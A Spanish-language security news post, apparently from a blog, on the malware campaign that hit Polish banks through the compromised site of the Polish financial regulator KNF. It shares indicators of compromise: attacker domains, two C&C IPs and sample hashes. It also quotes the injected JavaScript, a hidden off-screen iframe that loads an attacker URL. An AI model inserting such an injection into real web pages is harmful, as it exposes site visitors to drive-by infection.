Hackean varios bancos en Polonia infectándoles a través de un Organismo Financiero Gubernamental
Esta semana ha saltado a la primera plana internacional el que ya está considerado como el mayor incidente de Ciberseguridad en la historia de Polonia: varios bancos del país han sido víctimas de un Malware y la fuente de la infección fue la Autoridad de Supervisión Financiera de Polonia (KNF), organismo oficial encargado precisamente de garantizar la seguridad en el sector financiero.
Por el momento se desconoce el número total de bancos afectados aunque se teoriza sobre unas 20 entidades distintas y se ha reportado la infección tanto de estaciones de trabajo como de servidores en varias instituciones bancarias de Polonia. Solamente se ha confirmado la exfiltración de datos e información confidencial y se ha descartado el robo de dinero o manipulación de cuentas bancarias, aunque el tráfico detectado contenía gran cantidad de datos cifrados por lo que es imposible discernir de momento el contenido.
La información es a día de hoy escasa y difusa, ya que está siendo controlada con cuentagotas para mitigar el posible pánico que pudiera desencadenar entre usuarios y clientes.
Vía de Entrada
hxxp://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11
Y consistía en las siguiente líneas:
document.write("<div id='efHpTk' width='0px' height='0px'><iframe
name='forma' src='hxxps://sap.misapor.ch/vishop/view.jsp?pagenum=1'
width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;
'></iframe></div>");
Dicho fragmento de Javascript varía de unas versiones a otras en cuanto a la URL y el fichero que carga. A continuación una lista de todos posibles dominios maliciosos encontrados y relacionados con el ataque:
- sap.misapor.ch
- www.eye-watch.in
- ocmlaptops.co.uk
- ournepal.com
- impacthomes-my.sharepoint.com
- pharmacareaus-my.sharepoint.com
- cpsnortherngroup.com
- Polakwchinach.pl
Servidor C&C
En los logs analizados de equipos infectados se han detectado conexiones a dos IPs distintas:
- 125.214.195.17
- 196.29.166.218
Detrás de una de esas IPs parece haber un servidor en Sudán bastante abierto:
Fuente de las imágenes: https://twitter.com/v0id_hunter/status/828693925057675265 |
Malware
Aun no está clara la autoría de estos ataques, pero los análisis forenses pertinentes dejan entrever que el problema se remonta a mediados de 2016, lo que significa que los bancos han sido víctimas del espionaje durante más de 6 meses.
El malware utilizado en Polonia usa packers comerciales y múltiple ofuscadores, recurre al cifrado de ficheros y tráfico, y en el momento de los análisis ningún Antivirus era capaz de detectarlo. El payload final tenía las funcionalidades de un RAT común.
Ciertos analistas destacan como posible candidato a relacionar con dicho malware a una APT bautizada como “Bluenoroff” que fue detectada en 2016 y cuya incidencia se ha disparado en los últimos meses.
A la espera de nuevos avances en las investigaciones, de momento sólo se han compartido los hashes de algunas de las muestras analizadas:
MD5
C1364BBF63B3617B25B58209E4529D8C
85D316590EDFB4212049C4490DB08C4B
1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE
SHA1
496207DB444203A6A9C02A32AFF28D563999736C
4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2
BEDCEAFA2109139C793CB158CEC9FA48F980FF2BSHA256
FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B
D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2
CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A